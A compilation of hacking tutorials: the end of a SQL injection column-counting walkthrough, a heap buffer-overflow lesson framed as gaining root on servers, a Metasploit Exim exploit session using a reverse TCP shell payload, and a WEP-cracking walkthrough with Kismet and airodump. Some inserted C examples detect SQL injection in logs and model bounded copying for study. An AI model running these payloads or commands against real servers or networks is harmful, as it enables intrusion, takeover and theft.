but 7 is less than or equal to the number 5 so. Better get the next request ...

_http: / / xxx / news.php? id = 1 'GROUP BY 6 -

No errors ... but 7 is less than or equal to the number 6, so. These columns are followed by 6 that the required number.
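From the defender's side, the probing above leaves a clear trace in the web server's access log: the id parameter of news.php stops being a plain integer and starts carrying a quote, UNION SELECT with a growing column list, or GROUP BY with a number. The following C scanner, an added example that is not part of the original article, flags exactly those requests; the log lines it reads are constructed for the example, and the news.php path and id parameter are taken from the article.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Percent-decode a query-string value into dst (capacity dstsz), mapping '+'
 * to a space so that "1+UNION" and "1%20UNION" compare equal. */
static void url_decode(const char *src, size_t srclen, char *dst, size_t dstsz) {
    size_t o = 0;
    for (size_t i = 0; i < srclen && o + 1 < dstsz; i++) {
        if (src[i] == '%' && i + 2 < srclen &&
            isxdigit((unsigned char)src[i + 1]) && isxdigit((unsigned char)src[i + 2])) {
            char hex[3] = { src[i + 1], src[i + 2], '\0' };
            dst[o++] = (char)strtol(hex, NULL, 16);
            i += 2;
        } else if (src[i] == '+') {
            dst[o++] = ' ';
        } else {
            dst[o++] = src[i];
        }
    }
    dst[o] = '\0';
}

/* Find the raw value of the id= parameter in a request URI such as
 * "/news.php?id=1 HTTP/1.0"; returns NULL when there is none. */
static const char *find_id_value(const char *uri, size_t *len) {
    const char *p = strchr(uri, '?');
    if (!p) return NULL;
    p++;
    for (;;) {
        const char *end = p + strcspn(p, "& \t\r\n");
        if (end - p >= 3 && strncmp(p, "id=", 3) == 0) {
            *len = (size_t)(end - p - 3);
            return p + 3;
        }
        if (*end != '&') return NULL;
        p = end + 1;
    }
}

/* Classify the id value: a legitimate news id is a plain integer (optionally
 * negative); anything else is the probing the article walks through.
 * Returns 1 when suspicious and points *why at a short reason, 0 otherwise. */
int classify_id_param(const char *uri, const char **why) {
    size_t vlen;
    const char *v = find_id_value(uri, &vlen);
    char val[256], upper[256];
    if (!v) { *why = "no id parameter"; return 0; }
    url_decode(v, vlen, val, sizeof val);
    size_t j = (val[0] == '-') ? 1 : 0;            /* id=-1 is still numeric */
    if (isdigit((unsigned char)val[j])) {
        while (isdigit((unsigned char)val[j])) j++;
        if (val[j] == '\0') { *why = "numeric"; return 0; }
    }
    for (size_t k = 0;; k++) {                      /* case-insensitive keyword match */
        upper[k] = (char)toupper((unsigned char)val[k]);
        if (val[k] == '\0') break;
    }
    if (strstr(upper, "UNION") && strstr(upper, "SELECT")) { *why = "UNION SELECT column probing"; return 1; }
    if (strstr(upper, "GROUP BY")) { *why = "GROUP BY column counting"; return 1; }
    if (strchr(val, '\'')) { *why = "quote injected into numeric parameter"; return 1; }
    if (strstr(val, "--") || strchr(val, ';')) { *why = "comment or statement terminator"; return 1; }
    *why = "non-numeric id";
    return 1;
}

/* Constructed access-log lines for the example (not from any real server). */
static const char *const SAMPLE_LOG[] = {
    "10.0.0.5 - - [01/Jan/2010:10:00:00 +0000] \"GET /news.php?id=1 HTTP/1.0\" 200 512",
    "10.0.0.5 - - [01/Jan/2010:10:00:01 +0000] \"GET /news.php?id=1%27 HTTP/1.0\" 500 97",
    "10.0.0.5 - - [01/Jan/2010:10:00:02 +0000] \"GET /news.php?id=-1%27+UNION+SELECT+1,2,3,4,5,6+-- HTTP/1.0\" 200 480",
    "10.0.0.5 - - [01/Jan/2010:10:00:03 +0000] \"GET /news.php?id=1%27+GROUP+BY+10+-- HTTP/1.0\" 500 97",
    "10.0.0.9 - - [01/Jan/2010:10:00:04 +0000] \"GET /index.php?page=2 HTTP/1.0\" 200 2048",
};
#define SAMPLE_LOG_COUNT (sizeof SAMPLE_LOG / sizeof SAMPLE_LOG[0])

/* Count the flagged requests among access-log lines, printing each reason. */
size_t count_suspicious(const char *const lines[], size_t n) {
    size_t hits = 0;
    for (size_t i = 0; i < n; i++) {
        const char *req = strstr(lines[i], "GET ");
        const char *why;
        if (req && classify_id_param(req + 4, &why)) {
            printf("line %zu: %s\n", i + 1, why);
            hits++;
        }
    }
    return hits;
}

int main(void) {
    printf("%zu suspicious request(s)\n", count_suspicious(SAMPLE_LOG, SAMPLE_LOG_COUNT));
    return 0;
}
```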


That's all for this article; the rest will be in the next one.


Regards,
Zulqurnain jutt

Get Root on server part 2




Buffer Overflow ( Root on Server 2)



This book is not for beginners, so first see my previous article on getting root on a server, part 1.


Assalam-0-Alaikum,
-------------------------------------------------786---------------------------------------------------------



I am Going To Complete my Series Of:



  1. Rooting on Server Part I
  2. Rooting on Server Part II




This book has C source code, so if you don't know C you may have some problems with it; you
also need some notions of ASM and of how to use GDB.
So learn C and come back later.



Chapters




  1. Introduction To Buffer Overflow
  2. Full tutorial Buffer Overflow (discover & attack)
  3. The Metasploit Project







1) Introduction To Buffer Overflow:

In computer security and programming, a buffer overflow, or buffer overrun, is an anomaly where a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory. This is a special case of violation of memory safety. Buffer overflows can be triggered by inputs that are designed to execute code, or alter the way the program operates. This may result in erratic program behavior, including memory access errors, incorrect results, a crash, or a breach of system security. They are thus the basis of many software vulnerabilities and can be maliciously exploited. Programming languages commonly associated with buffer overflows include C and C++, which provide no built-in protection against accessing or overwriting data in any part of memory and do not automatically check that data written to an array (the built-in buffer type) is within the boundaries of that array. Bounds checking can prevent buffer overflows.


Source :
“This  is From Wikipedia, the free encyclopedia”


I know that it's like Chinese for you :p But we will learn much, so let's talk.


I know that you have a lot of questions



What is the reason of this Crazy bug?


> it's an error of programming (writing code).



Is it important to learn? Isn't it just a small, stupid exploit?

> this type of exploit is what makes the difference between professional hackers and normal
hackers. I will explain that in Lesson 4 ;) .



Can you give me a technical description?


A buffer overflow occurs when data written to a buffer, due to insufficient bounds checking, corrupts
data values in memory addresses adjacent to the allocated buffer. Most commonly this occurs when
copying strings of characters from one buffer to another.



Basic example

In the following example, a program has defined two data items which are adjacent in memory: an 8-
byte-long string buffer, A, and a two-byte integer, B. Initially, A contains nothing but zero bytes, and B
contains the number 1979. Characters are one byte wide.

Variable name       A                          B
value               [null string]              1979
hex value           00 00 00 00 00 00 00 00    07 BB



Now, the program attempts to store the null-terminated string "excessive" in the A buffer. By failing to
check the length of the string, it overwrites the value of B:


Variable name       A                                  B
value               'e' 'x' 'c' 'e' 's' 's' 'i' 'v'    25856
hex value           65 78 63 65 73 73 69 76            65 00





Although the programmer did not intend to change B at all, B's value has now been replaced by a
number formed from part of the character string. In this example, on a big-endian system that uses
ASCII, "e" followed by a zero byte would become the number 25856. If B was the only other variable
data item defined by the program, writing an even longer string that went past the end of B could cause
an error such as a segmentation fault, terminating the process.





  • Buffer Overflow exploits.


let's talk about it.
A buffer overflow problem is based in the memory where the program stores its data.



Why is that?


> you ask. Well, because what a buffer overflow does is overwrite specific memory places with something you want, and that will make the program do something that you want.

Well some of you right now are thinking

"WOW, Finally I know how buffer overflow
works",

but you still don't know how to spot them.

Let's follow a program and try to find and fix the buffer overflow

****************

2) Full tutorial Buffer Overflow (discover & attack)



buffer Overflow Exploits

The thing you should know is that everyone knows how to use them (how do you think most of the websites out there get defaced?), the script kiddies???


Just go to sites like security focus, Exploit DB or fyodor's exploit
world or Injector …


download it and run it, and then get busted. But why doesn't
everybody write exploits and shellcodes? Well, the problem is that
many people don't know how to spot a vulnerability in the
source code, or even if they can, they aren't able to write an exploit.
All they know is
just
"perl exploit blablabla"...


Even my grand mother can do it :P


> So now you have an idea of what an exploit is.


Let's Begin the Work


you must do the experiment with me, so I advise you to

download Code::Blocks to write your code and see the results
(Xcode for Mac).




------ Partial code below--------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv) {
    char *somevar;
    char *important;
    if (argc < 2) return 1;           /* the program expects one argument */
    somevar = (char *)malloc(sizeof(char)*4);
    important = (char *)malloc(sizeof(char)*14);
    strcpy(important, "command"); /*This one is the important
    variable*/
    strcpy(somevar, argv[1]);     /* no length check: argv[1] can overrun the 4-byte buffer */
    /* ..... Code here .... */
    return 0;
}
/* .... Other functions here .... */
------- End Of Partial Code -----

> I guess that Everything is Clear


So let's say that the important variable stores some system command like, let's say, "chmod o-r file" (example), and since that file is owned by root the program is run under the root user too; this means that if you can send commands to it, you can execute ANY system command (mkdir, ls -la, cd ...). You will play with the server like a doll. So you start thinking: how the hell can I put something that I want in the important variable? Well, the way is to overflow the memory so we can reach it. But first let's see the variables' memory addresses. To do that you need to rewrite the code. Check the following code:




----------Partial Code------------------
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char **argv) {
    char *somevar;
    char *important;
    somevar=(char *)malloc(sizeof(char)*4);
    important=(char *)malloc(sizeof(char)*14);
    printf("%p\n%p\n", somevar, important);
    exit(0);
    /* rest of code here */
}
-----------End of Partial Code-----------


Now You Will Say

Wow what the hell is this  ??? :p


Well, I just added 2 lines to the source code and left the rest unchanged. Let's see what those two lines do.


The printf("%p\n%p", somevar, important); line will print the memory addresses of the somevar and important variables. The exit(0); will just keep the rest of the program from running; after all, you don't need it for anything, your goal was only to know where the variables are stored.

After running the program you would get an output like the following (you will probably
not get the same memory addresses):


0x8049700 <----- this is the address of somevar
0x8049710 <----- this is the address of important


As we can see, the important variable is next to somevar; this will let us use our buffer overflow skills, since somevar is taken from argv[1]. Now we know that one follows the other, but let's check each memory address so we can have a precise notion of the data storage. To do this let's rewrite the code again.


--------Partial code------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv) {
    char *somevar;
    char *important;
    char *temp; /* will need another variable */
    if (argc < 2) return 1;
    somevar=(char *)malloc(sizeof(char)*4);
    important=(char *)malloc(sizeof(char)*14);
    strcpy(important, "command"); /*This one is the important variable*/
    strcpy(somevar, argv[1]);     /* unchecked copy of argv[1] into the 4-byte buffer */
    printf("%p\n%p\n", somevar, important);
    printf("Starting To Print memory address:\n");
    temp = somevar; /* this will put temp at the first memory address we want*/
    while(temp < important + 14) {
        /* this loop will be broken when we get to the last memory address we want, last memory address of important variable */
        printf("%p: %c (0x%x)\n", temp, *temp, *(unsigned int*)temp);
        temp++;
    }
    exit(0);
    /* rest of code here */
}
--------------End Of partial Code----------



Now let's say that in normal use argv[1] should be send. So you just type at your prompt:

$ program_name send

You'll get an output like:

0x8049700
0x8049710

Starting To Print memory address:
0x8049700: s (0x616c62)
0x8049701: e (0x616c)
0x8049702: n (0x61)     <---- each of these lines represents a memory address
0x8049703: d (0x0)
0x8049704: (0x0)
0x8049705: (0x0)
0x8049706: (0x0)
0x8049707: (0x0)
0x8049708: (0x0)
0x8049709: (0x19000000)
0x804970a: (0x190000)
0x804970b: (0x1900)
0x804970c: (0x19)
0x804970d: (0x63000000)
0x804970e: (0x6f630000)
0x804970f: (0x6d6f6300)
0x8049710: c (0x6d6d6f63)
0x8049711: o (0x616d6d6f)
0x8049712: m (0x6e616d6d) < command
0x8049713: m (0x646e616d)
0x8049714: a (0x646e61)
0x8049715: n (0x646e)
0x8049716: d (0x64)
0x8049717: (0x0)
0x8049718: (0x0)
0x8049719: (0x0)
0x804971a: (0x0)
0x804971b: (0x0)
0x804971c: (0x0)
0x804971d: (0x0)
$


Nice, isn't it? You can now see that there are 12 empty memory addresses between somevar and important. So let's say that you run the program with a command line like:


$ program_name send------------newcommand


You'll get an output like:


0x8049700
0x8049710
Starting To Print memory address:
0x8049700: s (0x646e6573)
0x8049701: e (0x2d646e65)
0x8049702: n (0x2d2d646e)
0x8049703: d (0x2d2d2d64)
0x8049704: - (0x2d2d2d2d)
0x8049705: - (0x2d2d2d2d)
0x8049706: - (0x2d2d2d2d)
0x8049707: - (0x2d2d2d2d)
0x8049708: - (0x2d2d2d2d)
0x8049709: - (0x2d2d2d2d)
0x804970a: - (0x2d2d2d2d)
0x804970b: - (0x2d2d2d2d)
0x804970c: - (0x2d2d2d2d)
0x804970d: - (0x6e2d2d2d)
0x804970e: - (0x656e2d2d)
0x804970f: - (0x77656e2d)
0x8049710: n (0x6377656e) <--- memory address where the important variable starts
0x8049711: e (0x6f637765)
0x8049712: w (0x6d6f6377)
0x8049713: c (0x6d6d6f63)
0x8049714: o (0x616d6d6f)
0x8049715: m (0x6e616d6d)
0x8049716: m (0x646e616d)
0x8049717: a (0x646e61)
0x8049718: n (0x646e)
0x8049719: d (0x64)
0x804971a: (0x0)
0x804971b: (0x0)
0x804971c: (0x0)
0x804971d: (0x0)


newcommand got written over command. Now the program does something you want, instead of what it was supposed to do.


NOTE: Remember that sometimes those spaces between somevar and important can hold other variables instead of being empty, so check their values and send the same values to the same addresses, or the program can crash before getting to the variable that you modified. Now let's think a little.



Why does this happen?


> As you can see in the source code, somevar is declared before important; this will make, most of the
times, somevar come first in memory. Now, let's check how each one gets its value. somevar gets its value from argv[1], and important gets it from the strcpy() function, but the real problem is that important's value is assigned first, so when you assign a value to somevar, which sits before it, important can be overwritten.
This program could be patched against this buffer overflow by switching those two lines,

becoming:
strcpy(somevar, argv[1]);
strcpy(important, "command");


If this was the way the program was written, even if you give an argument that reaches the memory address of important, it will be overwritten by the true command, since after getting somevar the value command is assigned to important. This kind of buffer overflow is a heap buffer overflow. As you have probably seen, they are really easy to do in theory, but in the real world it's not so easy to do them; after all, the example I gave was a really dumb program, right? It's a real pain in the ass to find those important variables, and to overflow such a variable you also need to be able to write to one that is at a lower memory address; most of the time not all of these conditions are met. This is why we find bugs in the most used software, like RealPlayer, VLC player and many others; even Adobe Flash, used to see videos on YouTube and Facebook, was affected. Every day bug researchers discover bugs in many programs, but the good thing is that not all hackers in the world can do it :D and there are always updates and patches to keep your PCs and servers protected. This is why you find "admin patch your ass XD" on my index. Buffer overflows are like a sea; if you are really interested and want to learn everything about them, see the Wiki.
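The following C program is an added example, not code from the original article or from the 0xHat book. It models the two heap chunks from the dump above inside one byte array (somevar at offset 0 for 0x8049700, important 16 bytes later for 0x8049710), so the overwrite can be reproduced without writing to memory the program does not own, and it compares three versions: the article's vulnerable order, the line-swap patch just described, and a bounded copy, which is the bounds check the Wikipedia excerpt above names as the prevention. The same mechanism is what turns B into 25856 in the A/B example earlier; only the gap between the two variables differs.

```c
#include <stdio.h>
#include <string.h>

/* Layout taken from the article's dump: somevar at offset 0 (0x8049700) and
 * important 16 bytes later (0x8049710). Both chunks live in one array so the
 * overflow stays inside memory we own; a real heap is not so forgiving. */
enum { SOMEVAR_OFF = 0, SOMEVAR_SZ = 4, IMPORTANT_OFF = 16, IMPORTANT_SZ = 14, REGION_SZ = 32 };

typedef struct { char bytes[REGION_SZ]; } heap_model;

/* Bounded copy: never writes more than dstsz bytes and always NUL-terminates.
 * Returns 1 if src had to be truncated, 0 if it fit. */
int copy_bounded(char *dst, size_t dstsz, const char *src) {
    size_t n = strlen(src);
    if (dstsz == 0) return 1;
    if (n >= dstsz) {
        memcpy(dst, src, dstsz - 1);
        dst[dstsz - 1] = '\0';
        return 1;
    }
    memcpy(dst, src, n + 1);
    return 0;
}

/* The article's original order: "command" is stored first, then the argument
 * is copied into the 4-byte somevar with no length check (what strcpy does).
 * Returns the string found in important afterwards, or NULL if the argument
 * would not even fit the modelled region. */
const char *vulnerable_order(heap_model *h, const char *arg) {
    memset(h->bytes, 0, REGION_SZ);
    if (strlen(arg) + 1 > REGION_SZ - SOMEVAR_OFF) return NULL;
    memcpy(h->bytes + IMPORTANT_OFF, "command", sizeof "command");
    memcpy(h->bytes + SOMEVAR_OFF, arg, strlen(arg) + 1);
    return h->bytes + IMPORTANT_OFF;
}

/* The article's patch: the two lines swapped, so "command" is written last.
 * important survives, but the unchecked copy still clobbers everything between
 * the two chunks (and anything past important for a longer argument). */
const char *swapped_order(heap_model *h, const char *arg) {
    memset(h->bytes, 0, REGION_SZ);
    if (strlen(arg) + 1 > REGION_SZ - SOMEVAR_OFF) return NULL;
    memcpy(h->bytes + SOMEVAR_OFF, arg, strlen(arg) + 1);
    memcpy(h->bytes + IMPORTANT_OFF, "command", sizeof "command");
    return h->bytes + IMPORTANT_OFF;
}

/* The bounds-checked version: the copy is limited by the destination size, so
 * the argument can never leave somevar, whatever order the assignments run in. */
const char *bounded_order(heap_model *h, const char *arg, int *truncated) {
    memset(h->bytes, 0, REGION_SZ);
    memcpy(h->bytes + IMPORTANT_OFF, "command", sizeof "command");
    *truncated = copy_bounded(h->bytes + SOMEVAR_OFF, SOMEVAR_SZ, arg);
    return h->bytes + IMPORTANT_OFF;
}

int main(void) {
    heap_model h;
    int truncated;
    /* "send", twelve dashes to reach offset 16, then "newcommand": the argument from the article's run */
    const char *payload = "send" "----" "----" "----" "newcommand";
    printf("vulnerable: important = \"%s\"\n", vulnerable_order(&h, payload));
    printf("swapped:    important = \"%s\"\n", swapped_order(&h, payload));
    printf("bounded:    important = \"%s\"", bounded_order(&h, payload, &truncated));
    printf(" (somevar = \"%s\", truncated = %d)\n", h.bytes + SOMEVAR_OFF, truncated);
    return 0;
}
```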


For this lesson I read a lot of articles; they really helped me explain BOF to people.
Let's see the best hacking tool. You know what I'm talking about:
yeah, it's the Metasploit Project.

*********************************



3) The Metasploit Project



I guess that most of you know this great software, but if you don't, read this:


The Metasploit Project is an open-source computer security project which provides
information about security vulnerabilities and aids in penetration testing and IDS
signature development. Its most well-known sub-project is the Metasploit Framework, a
tool for developing and executing exploit code against a remote target machine. Other
important sub-projects include the Opcode Database, shellcode archive, and security
research.


I guess now you have an idea about Metasploit. Most people think that Metasploit is just for hacking PCs -[-' they are really jerks.
Ok, you have a server IP and you want to test hacking it; if you don't find a script-kiddie exploit or any PHP exploits, what do you do? Hein? First of all get nmap and scan the server, and check the software behind the open ports;
then hack it: if you are lucky you will find an unpatched version.^^ I advise everybody to get BackTrack 5.


I will give you an example of how to use metasploit
$ msfconsole
METASPLOIT
msf > use exploit/unix/smtp/exim4_string_format
msf exploit(exim4_string_format) > show payloads
msf exploit(exim4_string_format) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(exim4_string_format) > set LHOST [MY IP ADDRESS]
msf exploit(exim4_string_format) > set RHOST [TARGET IP]
msf exploit(exim4_string_format) > exploit


This is just a simple example of how to use Metasploit with the Exim exploit ;).


END

Finally, I want to say good luck :D

A very beautifully explained article from the 0xHat book; regards to him. Article bloggerized by

Zulqurnain jutt

What is Wireless Hacking And its working

( by T3es)

Wireless networks are widely used in today's life and easy to manage. Wireless networks are everywhere: they are widely available, cheap, and easy to set up. To avoid the hassle of setting up a wired network in my own home, I chose to go wireless. After a day of enjoying this wireless freedom, I began thinking about security. How secure is my wireless network? I searched the Internet for many days, reading articles, gathering information, and participating on message boards and forums. I soon came to the realization that the best way for me to understand the security of my wireless network would be to test it myself. Many sources said it was easy, few said it was hard.


How a wireless network works



A wireless local area network (WLAN) is the linking of 2 or more computers with Network Interface Cards (NICs) through a technology based on radio waves. All devices that can connect to a wireless network are known as stations. Stations can be access points (APs) or clients.
Access points are base stations for the wireless network. They receive and transmit information for the clients to communicate with.
The set of all stations that communicate with each other is referred to as the Basic Service Set (BSS). Every BSS has an identification known as a BSSID, also known as the MAC address, which is a unique identifier that is associated with every NIC.
For any client to join a WLAN, it should know the SSID of the WLAN; therefore, the access points typically broadcast their SSID to let the clients know that an AP is in range.
Data streams, known as packets, are sent between the Access Point and its clients. You need no physical access to the network or its wires to pick up these packets, just the right tools. It is the transmission of these packets that poses the largest security threat to any wireless network.

Wireless Encryption



The majority of home and small business networks are encrypted using the two most popular methods:
  • WEP
  • WPA

WEP:

    Wired Equivalent Privacy – comes in 3 different key lengths: 64, 128, and 256 bits, known as WEP 64, WEP 128, and WEP 256 respectively. WEP provides a casual level of security but is more compatible with older devices; therefore, it is still used quite extensively. Each WEP key contains a 24 bit Initialization Vector (IV), and a user-defined or automatically generated key; for instance, WEP 128 is a combination of the 24 bit IV and a user entered 26 digit hex key. ((26*4)+24=128)
WEP also comes in WEP2 and WEP+, which are not as common and still as vulnerable as the standard WEP encryption.

WPA:

   WiFi Protected Access – comes in WPA and WPA2, and was created to resolve several issues found in WEP. Both provide you with good security; however, they are not compatible with older devices and therefore not used as widely. WPA was designed to distribute different keys to each client; however, it is still widely used in a (not as secure) pre-shared key (PSK) mode, in which every client has the same passphrase.
To fully utilize WPA, a user would need an 802.1x authentication server, which small businesses and typical home users simply cannot afford. WPA utilizes a 48 bit Initialization Vector (IV), twice the size of WEP, which combined with other WEP fixes, allows substantially greater security over WEP.

Packets and IVs



It’s all in the packets. The bottom line is – while you may be able to employ several security features on your WLAN – anything you broadcast over the air can be intercepted, and could be used to compromise the security on your network. If that frightens you, start stringing wires throughout your home.
Every encrypted packet contains a 24 or 48 bit IV, depending on the type of encryption used. Since the pre-shared key is static and could be easily obtained, the purpose of the IV is to encrypt each packet with a different key. For example, to avoid a duplicate encryption key in every packet sent, the IV is constantly changing. The IV must be known to the client that received the encrypted packet in order to decrypt it; therefore, it is sent in plaintext.
The problem with this method is that the Initialization Vectors are not always different. In theory, if every IV was different, it would be nearly impossible to obtain the network key; this is not the case. WEP comes with a 24 bit IV, therefore giving the encryption 16 million unique values that can be used. This may sound like a large number, but when it comes to busy network traffic, it’s not.
Every IV is not different; and this is where the issues arise. Network hackers know that all the keys used to encrypt packets are related by a known IV (since the user entered WEP part of the key is rarely changed); therefore, the only change in the key is 24 bits. Since the IV is randomly chosen, there is a 50% probability that the same IV will repeat after just 5,000 packets; this is known as a collision.
If a hacker knows the content of one packet, he can use the collision to view the contents of the other packet. If enough packets are collected with IV matches, your network’s security can be compromised.
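The 5,000-packet figure above can be checked: with IVs drawn at random from 2^24 values, the chance that two packets share an IV is the birthday problem. The following C program is an added example, not part of the original article; it computes that probability exactly for the 24-bit WEP IV and, under the same uniform-random assumption the article makes, for a 48-bit IV, without needing libm.

```c
#include <stdint.h>
#include <stdio.h>

/* Probability that at least one IV value repeats among n packets when each IV
 * is drawn uniformly from 2^iv_bits values (the birthday problem). Computed
 * exactly as 1 - prod_{i=1}^{n-1} (1 - i/N), so no libm is needed. */
double iv_collision_probability(unsigned iv_bits, uint64_t n) {
    double space = (double)((uint64_t)1 << iv_bits);   /* N = 2^iv_bits */
    double no_repeat = 1.0;
    for (uint64_t i = 1; i < n; i++)
        no_repeat *= 1.0 - (double)i / space;
    return 1.0 - no_repeat;
}

/* Smallest number of packets at which the repeat probability reaches target
 * (0 < target < 1), found by extending the same product one packet at a time. */
uint64_t packets_until_collision(unsigned iv_bits, double target) {
    double space = (double)((uint64_t)1 << iv_bits);
    double no_repeat = 1.0;
    uint64_t n = 1;          /* a single packet has nothing to collide with */
    while (1.0 - no_repeat < target) {
        no_repeat *= 1.0 - (double)n / space;
        n++;
    }
    return n;
}

int main(void) {
    printf("WEP, 24-bit IV: P(repeat) after 5000 packets = %.3f\n",
           iv_collision_probability(24, 5000));
    printf("WEP, 24-bit IV: 50%% chance of a repeat after %llu packets\n",
           (unsigned long long)packets_until_collision(24, 0.5));
    printf("48-bit IV, same random-IV assumption: 50%% chance after %llu packets\n",
           (unsigned long long)packets_until_collision(48, 0.5));
    return 0;
}
```

With a 24-bit IV the 50% point lands at about 4,800 packets, which is the article's "just 5,000"; the 48-bit space pushes it to roughly 20 million.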

The Setup



My wireless network was powered by a Linksys WRT54G v6 wireless router; it is well known that this model is the most widely used wireless router. Out of the box, the Linksys router came with 1 CD which was nothing more than a visual step by step of what you should do to connect it.
A few things concern me with this router. There was no part in the setup that allowed me, or even told me to change my router’s default password. To change the password, I had to go into the router’s web-based setup utility; this was accessible via the IP address 192.168.1.1 in my Internet browser. The default username and password was admin. If someone was able to compromise the security on my network, they could have easily done this for me; and locked me out of my own network. Sure, I could have performed a hard reset on the router, but I’d have little luck without the Internet or any documentation to help.
If you’re looking to find your default username and password, there is quite a comprehensive list located at www.phenoelit.de My advice is to change this immediately, for it may save you some trouble down the road.
Being my first time, I decided to go easy; I set my router up with a basic WEP 64 encryption; it required a 10 digit hex key. I entered the key into the 2 other computers in my home, and I was ready to start.

Hardware



Out of everything I’ve experienced over the last couple weeks, this was the hardest obstacle, by far. I started with a Dell Latitude C610 notebook with a Linksys WPC54GS Wireless-G notebook adapter (Broadcom chipset) running Windows XP Pro; looking back, it was a bad choice.
When selecting hardware, be warned, not all network cards are equal. It turns out that nearly 99% of the software used to crack network keys is not compatible with notebook cards that have a Broadcom chipset; the ones that were just didn’t work.
9 out of every 10 articles I read boasted that the Orinoco Gold PCMCIA network card by Lucent was the absolute best pick and most compatible with all the good software. A trip to E-Bay, $30 later, and I was ready.
The software we will be using is strictly dependent on the chipset of the WNIC, and unfortunately, the operating system. Your best approach would be to research what software you will be using, and then find a card based on the chipset the software is compatible with.
There are many types of chipsets; too many, in fact, to mention. Linux-wlan.org has an unbelievably comprehensive list of WNICs and their corresponding chipset.
All the best programs are made for Linux; windows is certainly a drag when it comes to WLAN penetrating software, but if you don't have Linux, don't be too concerned.
It may be in your best interest to invest in a wireless card that has an external antenna jack. The Orinoco Gold WNIC I purchased has one, but since I'm compromising my own network in a short range, it won’t be necessary.

The Software

There are hundreds of applications you can use to do a variety of things with wireless networks. The largest list of software, that I came across, can be found at Wardrive.net. The term “wardriving” is more commonly used for this practice, and involves driving around neighborhoods to look for wireless networks. I refuse to use this term because that is not what I am doing; I am sitting in my home testing the vulnerabilities of my own network.
Let it be known, that it is not illegal to use software to detect the presence of wireless networks; however, if you crack the network and start “stealing” bandwidth, you could be in a world of trouble. Especially if you’re in Singapore.
Once I received my Orinoco card, I began re-installing software which did not previously work with my Linksys card. It was a nightmare; Windows XP kept getting in the way, software that had been modded to run on windows required daunting tasks for installation, some programs simply didn't work, some required special run time modules to be installed.
After nearly 48 hours of time-wasting, aggravating, disappointment; I came across the answer. A small penguin shone a beam of light upon my browser and blessed me; I found Auditor.
(2/6/07 - The link is currently not working, but you can obtain Auditor through any Torrent service.)
Auditor Security Collection is a self booting Linux-based CD that comes pre-loaded with all the best security software for auditing a system. It comes in a .ISO file that can be downloaded from remote-exploit.org; the ISO image file is roughly 649 Mb, and can be burned to a CD or DVD using most CD/DVD writing utilities.
It was truly amazing; a simple check in the Bios of the laptop to set the boot order to CD/DVD first, a slip of the Auditor CD, and a press of the power button was all it took. I was ready. Be not afraid of this Linux-based CD; everything is laid out on a GUI and all commands have “shortcuts” linking to them on a desktop similar to a windows environment.
Auditor Security Collection does not touch a single file on your hard drive. All files used and saved in the ASC are stored in your notebook’s RAM; once you remove the CD and reboot, everything is exactly as it was.

Detecting my wireless network

If you’ve come this far, believe me, you’re doing well. The first step is to find the network you want to penetrate. As there are a variety of apps that allow you to do this, we will be focusing in on the 2 most popular: Netstumbler, and Kismet.
Netstumbler – is a widely popular tool used for detecting 802.11a/b/g wireless networks. The latest version is Netstumbler 0.4.0, and will run in Windows XP. For compatible hardware and requirements, you can check the read me on the Netstumbler forums; or you could just try it. I’d like to point out that many sources have said the Linksys WPC54G/S WNIC does not work with Netstumbler; however, I have been able to make it work by launching the program, then removing and re-inserting the WNIC. The Orinoco Gold works fine with Netstumbler.
Kismet – does a little more than just detecting networks. Aside from providing every detail about a network except the encryption key, Kismet is a packet sniffer and intrusion detection system; we’ll get into sniffing packets a little later.
For this demonstration, we’ll be using the pre-loaded Kismet on the Auditor Security Collection. After inserting and booting the Auditor CD, I was ready to make sure everything was working properly.
From this point, the first thing that needed to be done was to ensure the wireless card was recognized by Auditor; to do this, you will have to venture into the dark world of the command prompt. In Auditor, the command prompt can be reached by clicking on the little black monitor icon located at the bottom of your screen.
Simply typing in iwconfig will allow you to see all the wireless extensions configured on the machine. If you see a screen full of data next to a WLAN0 or ETH0, you’re ready to continue to the next step; otherwise, you will see a list of “no wireless extensions” messages.
Next, you will need to start the Kismet program. You'll initially be prompted to enter a destination to save data to; you can just select the ’desktop’ and continue. When Kismet loads, you will see a black screen with green text showing all the wireless networks within you signal range.
Kismet will give you all the information you need to start cracking. Pressing ’s’ on your keyboard will bring up a ”Sort Network” dialogue box. From there you can press any of the desired sorting methods. This step is important as it allows you to select a particular wireless network on a list to view more details. Select your network with the arrow keys and press enter.
You will then be looking at nearly all your network details such as name, ssid, server IP, bssid, etc… Most are not relevant in this case, but you should write down a few things:
BSSID
Channel #
Encryption method
Pressing ‘x’ in Kismet will return you to the previous screen. Re-select your target WLAN; then press ‘SHFT+C’ to bring up a list of the clients associated to the Access Point. Write down the MAC address of all clients as it will prove useful.

Capturing packets


While you may have not been aware, at this point, Kismet has also been capturing packets. This is the bread and butter of cracking any wireless encryption; without data to process you have nothing.
Capturing packets, also known as packet sniffing, is the process of intercepting and logging traffic passing over a network. As information is sent and received over your wireless network, the software captures every packet to allow you to analyze and decode it.
Capturing network traffic can be a time-consuming process; especially if it is a slow network. With no-one on any computers in my home, I generally capture around 3,000 packets within 5 minutes; with users on the other 2 computers, this number is substantially greater. Don’t get confused, it’s not the packet itself that we want; but rather the IVs in the packets.
The programs we will be using to sniff packets are Kismet and Airodump (part of the Aircrack Suite). We've already touched on Kismet, so let's take a look at Airodump.
Before running Airodump, you must configure your wireless interface to go into ’monitor’ mode; the methods to achieve this require you to go back to the command prompt (konsole).
For most WNICs, you would use the command:
iwconfig <interface> mode monitor
And in some instances you would have to set the channel number on your WNIC to match that of the target access point:
iwconfig <interface> channel #
Note that you will have to replace <interface> with the network interface specific to your machine. Using an Orinoco Gold card, my network interface was eth0; but on most machines, it is wlan0 or ath0. So you may have to adjust those commands accordingly. You can find out for sure by simply typing iwconfig.
I should also point out that putting the Orinoco Gold card in ‘monitor’ mode had a different command altogether:
iwpriv eth0 monitor 2 1
Once you're in monitor mode, you’re ready to run Airodump. The command used to start Airodump is:
airodump <interface> <output file> [mac filter]
<output file> can be anything you wish; Airodump will put a .cap extension on the end of the name. The mac filter is used to only capture packets from a specific access point. For instance, I used:
airodump eth0 george 00:18:f8:65:fe:41
